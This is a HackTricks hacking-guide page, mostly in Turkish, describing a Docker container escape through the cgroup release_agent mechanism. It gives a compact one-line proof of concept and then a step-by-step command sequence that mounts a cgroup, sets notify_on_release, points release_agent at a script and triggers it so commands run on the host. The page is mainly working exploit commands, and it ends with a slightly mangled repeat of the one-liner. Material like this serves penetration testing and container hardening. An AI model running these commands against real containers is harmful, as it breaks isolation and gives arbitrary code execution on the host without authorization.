Docker release_agent cgroups escape

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

Daha fazla ayrıntı için orijinal blog yazısına bakın. Bu sadece bir özet:

Orijinal PoC:

d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh
$1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o

The proof of concept (PoC) demonstrates a method to exploit cgroups by creating a release_agent file and triggering its invocation to execute arbitrary commands on the container host. Here's a breakdown of the steps involved:

Ortamı Hazırlayın:

Bir /tmp/cgrp dizini, cgroup için bir montaj noktası olarak hizmet vermek üzere oluşturulur.
RDMA cgroup denetleyicisi bu dizine monte edilir. RDMA denetleyicisi yoksa, alternatif olarak memory cgroup denetleyicisinin kullanılması önerilir.

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

Çocuk Cgroup'u Kurun:

Montelenmiş cgroup dizini içinde "x" adında bir çocuk cgroup oluşturulur.
"x" cgroup'u için bildirimler, notify_on_release dosyasına 1 yazarak etkinleştirilir.

echo 1 > /tmp/cgrp/x/notify_on_release

Release Agent'i Yapılandırın:

Konteynerin ana makinedeki yolu /etc/mtab dosyasından alınır.
Ardından, cgroup'un release_agent dosyası, elde edilen ana makine yolunda bulunan /cmd adlı bir betiği çalıştıracak şekilde yapılandırılır.

host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

/cmd Scriptini Oluşturun ve Yapılandırın:

/cmd scripti konteyner içinde oluşturulur ve ps aux komutunu çalıştıracak şekilde yapılandırılır, çıktısı konteynerde /output adında bir dosyaya yönlendirilir. /output'un ana makinedeki tam yolu belirtilir.

echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd

Saldırıyı Tetikleme:

"x" çocuk cgroup içinde bir işlem başlatılır ve hemen sonlandırılır.
Bu, release_agent'i (cmd betiği) tetikler, bu da ana makinede ps aux komutunu çalıştırır ve çıktıyı konteyner içindeki /output'a yazar.

sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

Previousrelease_agent exploit - Relative Paths to PIDs NextSensitive Mounts

Last updated 4 days ago

d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` mkdir -p $d/w;echo 1 >$d/w/notify_on_release t=`sed -n 's/.*\perdir=$[^,]*$.*/\1/p' /etc/mtab` touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh $1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o